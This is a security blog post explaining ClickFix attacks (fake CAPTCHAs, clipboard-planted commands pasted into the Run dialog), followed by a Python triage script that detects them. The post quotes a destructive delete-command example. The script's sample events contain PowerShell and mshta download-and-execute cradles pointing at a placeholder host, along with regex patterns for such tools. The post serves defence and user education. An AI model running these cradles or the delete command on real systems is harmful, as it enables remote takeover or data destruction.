ClickFix attacks have been around for decades; only the name is new.
ClickFix attacks use social engineering to trick users into clicking on buttons and links that the user is told are needed so their browser or computer can perform some desired action.
The most common ClickFix example, and the one the name itself comes from, starts with a user intentionally searching for some computer error they are having…say Windows error 1F0039a (I made that up), and the search engine returning lots of links about that error.
Unbeknownst to the user, the search results have been gamed (i.e., “poisoned”) so that a simple search for a solution returns a malicious website high in the results. Usually the attacker has either built a fake website stuffed with the error text (repeated but hidden from the reader, so the search engine indexes it), or simply bought search advertising for that keyword so their site appears when it is searched on. Either way, the attacker’s link ends up high on the list of supposed solutions.
When the user goes to the malicious website, the scammer attempts to social engineer the user into performing an action that is against the user’s best interests. In most cases, it’s to click a button to fix something (hence, the “ClickFix” name). Sometimes the button click takes the user to another malicious website, sometimes it downloads a malicious document or content, and sometimes it brings up instructions that the user is supposed to copy and run on their computer.
Decades ago, early versions of the latter type of ClickFix attack would have the user type in some short command, like ‘\del. /e/s/f/q && Y’ or something similar, which would delete a lot of important operating system files and make the user’s system quickly unusable.
Today’s ClickFix attacks want control of the user’s system, not destruction. The commands they want the user to run are longer and more involved, so instead of asking the user to type them, they instruct the user to copy the command and paste it into a Run dialog, terminal, or PowerShell window on their own machine. If the user follows the instructions, the command typically downloads and launches a second stage, and the attacker ends up with remote access to the victim’s computer.
It’s pretty dastardly.
A very common ClickFix attack is where the user is taken to a malicious website and then purportedly shown a CAPTCHA dialog box that they must click on to “prove they are human.”
We’ve all seen those legitimate prompts. You click on them, you are validated, and you are allowed onto the website. With ClickFix sites, clicking the fake CAPTCHA instead produces a set of “verification steps.” The instructions usually tell the user to press Win+R (which opens the Run dialog box in Windows), then Ctrl+V, then Enter. What the user does not see is that the page’s script silently placed the malicious command on the clipboard the moment they clicked the CAPTCHA, so Ctrl+V pastes it into the now open Run box and Enter executes it. The pasted text is often padded with a reassuring comment such as “I am not a robot” so that the Run box shows something harmless-looking.
Although some ClickFix attacks are readily apparent, others are a little sneakier. Here are some good ClickFix examples from a sector alert by the US Department of Health and Human Services (https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf).
Brian Krebs did a great article on this type of ClickFix example here.
The Cybersecurity and Infrastructure Security Agency (CISA) is warning of this exact type of attack again, this time as used by the Interlock ransomware gang. In the Interlock warning, CISA states, “This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.”
So, it’s being used more and more.
The examples I’ve talked about, along with those from Brian Krebs and CISA, involve Microsoft Windows, but the same attack works on macOS and Linux with slight changes: the lure simply tells the user to open a Terminal and paste a shell command instead.
ClickFix attacks can be difficult to stop because there is no malicious attachment or download for endpoint detection and response (EDR) software to scan: the user runs the command themselves, and it usually calls a built-in, signed tool such as PowerShell that EDR cannot simply block. What EDR and your logs can still see is the process tree. A command pasted into the Run dialog launches as a child of explorer.exe with an unusual command line (a download cradle, an encoded or hidden-window PowerShell invocation), and that combination is rare in normal user activity.
You can try to remove users’ access to command prompts and the Run dialog, but doing so is difficult in practice because it also breaks many legitimate processes, such as logon scripts and management tools, that run command prompts in the background.
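The process-tree signal described above is easy to turn into a triage rule. The following is an added example of my own, not code from the original post or from any vendor: it scores Sysmon-style process-creation events (ParentImage, Image, CommandLine are assumed field names) and alerts only when a script interpreter or LOLBin is launched from the Run dialog (parent explorer.exe) with a command line that carries download-cradle or evasion indicators. The sample events, the indicator list, and all hostnames (example.invalid) are constructed for illustration, not taken from a real campaign.

```python
"""Triage Windows process-creation events for ClickFix-style pastes.

Added example, not from the original post. Assumes Sysmon Event ID 1 style
fields (ParentImage, Image, CommandLine); the sample events are constructed.
"""
import ntpath
import re

# Win+R launches whatever the user pastes as a child of explorer.exe, so an
# interpreter under that parent with a download-and-execute command line is
# the signal we want. The "download a document" variants have other parents
# (browser, Office) and need different indicators; they are out of scope here.
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "msiexec.exe", "bitsadmin.exe",
}

# (compiled regex, label). Generic cradle/evasion patterns, not campaign IOCs.
INDICATORS = [
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
    (re.compile(r"downloadstring|invoke-webrequest|invoke-restmethod|\b(irm|iwr)\b", re.I), "download cradle"),
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), "hidden window"),
    (re.compile(r"mshta(\.exe)?\s+\"?https?://", re.I), "remote HTA"),
    (re.compile(r"certutil.*-urlcache|bitsadmin.*/transfer", re.I), "LOLBin download"),
    (re.compile(r"#.*(not a robot|verif|captcha|human)", re.I), "verification lure comment"),
]


def basename(path: str) -> str:
    """Lower-case file name from a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()


def score_event(event: dict) -> dict:
    """Return {'alert': bool, 'hits': [labels], 'reason': str} for one event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = [label for rx, label in INDICATORS if rx.search(cmd)]

    if image not in INTERPRETERS:
        return {"alert": False, "hits": hits, "reason": "not an interpreter/LOLBin"}
    if parent in RUN_DIALOG_PARENTS and hits:
        return {"alert": True, "hits": hits, "reason": "Run-dialog child with cradle indicators"}
    # An interpreter under explorer.exe with no indicators is normal (someone
    # typing "cmd" into Win+R), and a cradle under an agent or scheduler may be
    # admin automation. Both are worth a look, but neither is a page-out.
    return {"alert": False, "hits": hits, "reason": "no Run-dialog + indicator combination"}


def triage(events: list) -> list:
    """Run score_event over a batch and return only the alerting events."""
    results = []
    for e in events:
        r = score_event(e)
        if r["alert"]:
            results.append({"image": basename(e["Image"]), **r})
    return results


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {   # Fake-CAPTCHA paste into Win+R, with the usual reassuring comment.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/v.txt)" '
                       '# I am not a robot - reCAPTCHA Verification ID: 7811',
    },
    {   # mshta variant: remote HTA fetched straight from the Run box.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/verify.hta",
    },
    {   # Benign: a user opening a prompt from Win+R.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd",
    },
    {   # Benign-ish: a management agent downloading an installer. Has a cradle
        # indicator but the parent is not the Run dialog, so no alert.
        "ParentImage": r"C:\Program Files\Vendor\agent.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -NoProfile -Command "Invoke-WebRequest '
                       r'https://updates.example.invalid/agent.msi -OutFile C:\Temp\agent.msi"',
    },
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["image"], r["hits"], r["reason"])
```

The rule deliberately keys on the parent process rather than on the command text alone: the same PowerShell cradle under a management agent is probably automation, while under explorer.exe it almost always means a human pasted it. Tune INTERPRETERS and INDICATORS to your environment, and treat the lure-comment pattern as a strong but campaign-specific signal.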
You should educate your users about these types of attacks so that they know a website that asks them to copy text and run it on their computer, whatever the stated reason, is asking them to do something harmful.
A little education goes a long way.